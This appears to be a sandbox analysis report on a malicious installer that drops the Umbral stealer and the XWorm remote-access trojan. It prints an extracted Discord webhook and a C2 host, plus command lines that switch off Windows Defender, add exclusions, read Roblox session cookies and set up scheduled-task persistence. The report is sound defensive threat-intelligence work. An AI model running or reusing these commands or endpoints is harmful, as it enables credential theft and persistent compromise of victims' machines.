Analysis
-
max time kernel
126s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
03-08-2024 15:04
Static task
static1
Behavioral task
behavioral1
Sample
SSPInstallerV2.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
SSPInstallerV2.exe
Resource
win10v2004-20240802-en
General
-
Target
SSPInstallerV2.exe
-
Size
634KB
-
MD5
8f27d14a78615dc0c6d100ca3f96a86a
-
SHA1
3d267acd9ae52e0585e091826a57af1a53450ae6
-
SHA256
2f724138cbe4102823295fb51e7edb615b95a0eeae09434596e70f28bc0e64a9
-
SHA512
0af71aed92eda0f10cd435a542d3b6fbada85be89e4d94f5c029ee81b0c0167140cf801bfdaa816d479aa435741a337f827be61683ffd32367d1b1c2d276c7d7
-
SSDEEP
6144:3kuuqTIKE3cPTWyG08SLGf5FKlunGth1mQVSomL3To7ovjqjvrKi5z5XThDLGfwk:3DuqhE3cPqy9uuunGtNSnP/OzHST
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1269302041445142548/7kHNPJkzcEXhevOi0GE-ta2E1mwfJ5-sBn7_at06BC13YjVrSo2F-y7QrDWzHj8zAjbY
Extracted
xworm
by-thus.gl.at.ply.gg:35938
-
Install_directory
%Temp%
-
install_file
SSPinstaller.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000e000000012025-5.dat family_umbral behavioral1/memory/2260-8-0x0000000000090000-0x00000000000EA000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016148-11.dat family_xworm behavioral1/memory/2004-13-0x0000000000A60000-0x0000000000A90000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1748 powershell.exe 2300 powershell.exe 2236 powershell.exe 3008 powershell.exe 1624 powershell.exe 1320 powershell.exe 1656 powershell.exe 264 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts requestInstall.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSPinstaller.lnk SSPInstaller.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSPinstaller.lnk SSPInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 2260 requestInstall.exe 2004 SSPInstaller.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\SSPinstaller = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SSPinstaller.exe" SSPInstaller.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 discord.com 12 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2944 cmd.exe 1772 PING.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 1320 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2148 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1772 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2120 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2260 requestInstall.exe 3008 powershell.exe 1320 powershell.exe 1656 powershell.exe 1864 powershell.exe 264 powershell.exe 1624 powershell.exe 1748 powershell.exe 2300 powershell.exe 2236 powershell.exe 2140 chrome.exe 2140 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2004 SSPInstaller.exe Token: SeDebugPrivilege 2260 requestInstall.exe Token: SeIncreaseQuotaPrivilege 2576 wmic.exe Token: SeSecurityPrivilege 2576 wmic.exe Token: SeTakeOwnershipPrivilege 2576 wmic.exe Token: SeLoadDriverPrivilege 2576 wmic.exe Token: SeSystemProfilePrivilege 2576 wmic.exe Token: SeSystemtimePrivilege 2576 wmic.exe Token: SeProfSingleProcessPrivilege 2576 wmic.exe Token: SeIncBasePriorityPrivilege 2576 wmic.exe Token: SeCreatePagefilePrivilege 2576 wmic.exe Token: SeBackupPrivilege 2576 wmic.exe Token: SeRestorePrivilege 2576 wmic.exe Token: SeShutdownPrivilege 2576 wmic.exe Token: SeDebugPrivilege 2576 wmic.exe Token: SeSystemEnvironmentPrivilege 2576 wmic.exe Token: SeRemoteShutdownPrivilege 2576 wmic.exe Token: SeUndockPrivilege 2576 wmic.exe Token: SeManageVolumePrivilege 2576 wmic.exe Token: 33 2576 wmic.exe Token: 34 2576 wmic.exe Token: 35 2576 wmic.exe Token: SeIncreaseQuotaPrivilege 2576 wmic.exe Token: SeSecurityPrivilege 2576 wmic.exe Token: SeTakeOwnershipPrivilege 2576 wmic.exe Token: SeLoadDriverPrivilege 2576 wmic.exe Token: SeSystemProfilePrivilege 2576 wmic.exe Token: SeSystemtimePrivilege 2576 wmic.exe Token: SeProfSingleProcessPrivilege 2576 wmic.exe Token: SeIncBasePriorityPrivilege 2576 wmic.exe Token: SeCreatePagefilePrivilege 2576 wmic.exe Token: SeBackupPrivilege 2576 wmic.exe Token: SeRestorePrivilege 2576 wmic.exe Token: SeShutdownPrivilege 2576 wmic.exe Token: SeDebugPrivilege 2576 wmic.exe Token: SeSystemEnvironmentPrivilege 2576 wmic.exe Token: SeRemoteShutdownPrivilege 2576 wmic.exe Token: SeUndockPrivilege 2576 wmic.exe Token: SeManageVolumePrivilege 2576 wmic.exe Token: 33 2576 wmic.exe Token: 34 2576 wmic.exe Token: 35 2576 wmic.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 1796 wmic.exe Token: SeSecurityPrivilege 1796 wmic.exe Token: SeTakeOwnershipPrivilege 1796 wmic.exe Token: SeLoadDriverPrivilege 1796 wmic.exe Token: SeSystemProfilePrivilege 1796 wmic.exe Token: SeSystemtimePrivilege 1796 wmic.exe Token: SeProfSingleProcessPrivilege 1796 wmic.exe Token: SeIncBasePriorityPrivilege 1796 wmic.exe Token: SeCreatePagefilePrivilege 1796 wmic.exe Token: SeBackupPrivilege 1796 wmic.exe Token: SeRestorePrivilege 1796 wmic.exe Token: SeShutdownPrivilege 1796 wmic.exe Token: SeDebugPrivilege 1796 wmic.exe Token: SeSystemEnvironmentPrivilege 1796 wmic.exe Token: SeRemoteShutdownPrivilege 1796 wmic.exe Token: SeUndockPrivilege 1796 wmic.exe Token: SeManageVolumePrivilege 1796 wmic.exe Token: 33 1796 wmic.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe 2140 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2260 2980 SSPInstallerV2.exe 30 PID 2980 wrote to memory of 2260 2980 SSPInstallerV2.exe 30 PID 2980 wrote to memory of 2260 2980 SSPInstallerV2.exe 30 PID 2980 wrote to memory of 2004 2980 SSPInstallerV2.exe 31 PID 2980 wrote to memory of 2004 2980 SSPInstallerV2.exe 31 PID 2980 wrote to memory of 2004 2980 SSPInstallerV2.exe 31 PID 2260 wrote to memory of 2576 2260 requestInstall.exe 33 PID 2260 wrote to memory of 2576 2260 requestInstall.exe 33 PID 2260 wrote to memory of 2576 2260 requestInstall.exe 33 PID 2260 wrote to memory of 2628 2260 requestInstall.exe 35 PID 2260 wrote to memory of 2628 2260 requestInstall.exe 35 PID 2260 wrote to memory of 2628 2260 requestInstall.exe 35 PID 2260 wrote to memory of 3008 2260 requestInstall.exe 37 PID 2260 wrote to memory of 3008 2260 requestInstall.exe 37 PID 2260 wrote to memory of 3008 2260 requestInstall.exe 37 PID 2260 wrote to memory of 1320 2260 requestInstall.exe 39 PID 2260 wrote to memory of 1320 2260 requestInstall.exe 39 PID 2260 wrote to memory of 1320 2260 requestInstall.exe 39 PID 2260 wrote to memory of 1656 2260 requestInstall.exe 41 PID 2260 wrote to memory of 1656 2260 requestInstall.exe 41 PID 2260 wrote to memory of 1656 2260 requestInstall.exe 41 PID 2260 wrote to memory of 1864 2260 requestInstall.exe 43 PID 2260 wrote to memory of 1864 2260 requestInstall.exe 43 PID 2260 wrote to memory of 1864 2260 requestInstall.exe 43 PID 2260 wrote to memory of 1796 2260 requestInstall.exe 45 PID 2260 wrote to memory of 1796 2260 requestInstall.exe 45 PID 2260 wrote to memory of 1796 2260 requestInstall.exe 45 PID 2260 wrote to memory of 2180 2260 requestInstall.exe 47 PID 2260 wrote to memory of 2180 2260 requestInstall.exe 47 PID 2260 wrote to memory of 2180 2260 requestInstall.exe 47 PID 2260 wrote to memory of 1488 2260 requestInstall.exe 49 PID 2260 wrote to memory of 1488 2260 requestInstall.exe 49 PID 2260 wrote to memory of 1488 2260 requestInstall.exe 49 PID 2260 wrote to memory of 264 2260 requestInstall.exe 51 PID 2260 wrote to memory of 264 2260 requestInstall.exe 51 PID 2260 wrote to memory of 264 2260 requestInstall.exe 51 PID 2260 wrote to memory of 2148 2260 requestInstall.exe 53 PID 2260 wrote to memory of 2148 2260 requestInstall.exe 53 PID 2260 wrote to memory of 2148 2260 requestInstall.exe 53 PID 2004 wrote to memory of 1624 2004 SSPInstaller.exe 55 PID 2004 wrote to memory of 1624 2004 SSPInstaller.exe 55 PID 2004 wrote to memory of 1624 2004 SSPInstaller.exe 55 PID 2260 wrote to memory of 2944 2260 requestInstall.exe 57 PID 2260 wrote to memory of 2944 2260 requestInstall.exe 57 PID 2260 wrote to memory of 2944 2260 requestInstall.exe 57 PID 2944 wrote to memory of 1772 2944 cmd.exe 59 PID 2944 wrote to memory of 1772 2944 cmd.exe 59 PID 2944 wrote to memory of 1772 2944 cmd.exe 59 PID 2004 wrote to memory of 1748 2004 SSPInstaller.exe 60 PID 2004 wrote to memory of 1748 2004 SSPInstaller.exe 60 PID 2004 wrote to memory of 1748 2004 SSPInstaller.exe 60 PID 2004 wrote to memory of 2300 2004 SSPInstaller.exe 62 PID 2004 wrote to memory of 2300 2004 SSPInstaller.exe 62 PID 2004 wrote to memory of 2300 2004 SSPInstaller.exe 62 PID 2004 wrote to memory of 2236 2004 SSPInstaller.exe 64 PID 2004 wrote to memory of 2236 2004 SSPInstaller.exe 64 PID 2004 wrote to memory of 2236 2004 SSPInstaller.exe 64 PID 2004 wrote to memory of 2120 2004 SSPInstaller.exe 66 PID 2004 wrote to memory of 2120 2004 SSPInstaller.exe 66 PID 2004 wrote to memory of 2120 2004 SSPInstaller.exe 66 PID 2004 wrote to memory of 3008 2004 SSPInstaller.exe 71 PID 2004 wrote to memory of 3008 2004 SSPInstaller.exe 71 PID 2004 wrote to memory of 3008 2004 SSPInstaller.exe 71 PID 2004 wrote to memory of 2864 2004 SSPInstaller.exe 73 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2628 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SSPInstallerV2.exe"C:\Users\Admin\AppData\Local\Temp\SSPInstallerV2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Roaming\requestInstall.exe"C:\Users\Admin\AppData\Roaming\requestInstall.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\requestInstall.exe"3⤵
- Views/modifies file attributes
PID:2628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\requestInstall.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2180
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:264
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2148
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\requestInstall.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1772
-
-
-
-
C:\Users\Admin\AppData\Roaming\SSPInstaller.exe"C:\Users\Admin\AppData\Roaming\SSPInstaller.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SSPInstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSPInstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSPinstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSPinstaller.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2236
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SSPinstaller" /tr "C:\Users\Admin\AppData\Local\Temp\SSPinstaller.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2120
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "SSPinstaller"3⤵PID:3008
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp449E.tmp.bat""3⤵PID:2864
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1320
-
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2736
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4e81⤵PID:1828
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2140 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5f99758,0x7fef5f99768,0x7fef5f997782⤵PID:556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:22⤵PID:952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:82⤵PID:1976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:82⤵PID:264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2332 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:12⤵PID:2376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2340 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:12⤵PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1116 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:22⤵PID:3032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1692 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:12⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3684 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:82⤵PID:3036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3708 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:12⤵PID:1652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3824 --field-trial-handle=1376,i,5739335954666206462,15303663608273763517,131072 /prefetch:12⤵PID:2344
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1636
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
161B
MD5d20900be5e297343758406769448b538
SHA1da57410d6b4f3465a7436cbad998663462351c2c
SHA256a2a93a9364518d647f6ddab79b2951dc27a6356003ffa1fcab08ab4a67c95344
SHA5120d7de67334f634360d52c4a84689d91105537914a0302772da6cba6f8393f311d2c4968350f787bf145b8096e2c64eb1241eb02f925d2005b841c35e22ffc99b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51144046fd6a84a0ef864e370857c7004
SHA15ec9fce8b8b88748374886af520f6227be344c07
SHA256ebbcadde6983b1374a1a1820359a3608d4fa78974b70747c4b0fd2b88fb0e397
SHA51271f0adecc603477102f2d8771209191c92d1259e47dfb4297073545950e60af868e46a38341dcb9d4575b3c8023782a3e544fcfbd65101f3976de660135137a5
-
Filesize
171KB
MD5c9e72423dd94f42bf222d9a7fdb6eff9
SHA1c724cd012c0c17a9222427d021fab0f3a0f25ac0
SHA2568dcffd289f6b10088c345182b1d28ae492a3875b05af7f06dc0ff1d504461a16
SHA5126265cfddc5320ef22954dae241a4988898ca6a80b48e1269f9b9df6ad22603dfd4f456d76b524062e904c00609ae9084728229872f8311120d9e71ed9db40b80
-
Filesize
338KB
MD54cd80597cf008592993ec6ec3780549c
SHA1827a960dcc89c07cf8a80c97e2f2a281474d8c7f
SHA25648c41a739d33db337ca33ab78b31e7bb13378508af1b2b8168594cc12268134b
SHA512024fc64eaddc10370e64fe6531030e92a0c666c40737dccae071927c36fca86cb3c0828589014a6e3d1a108846e3bbde1be3c3afe2a996f9b843e9fb51b3b43d
-
Filesize
2KB
MD5577f27e6d74bd8c5b7b0371f2b1e991c
SHA1b334ccfe13792f82b698960cceaee2e690b85528
SHA2560ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c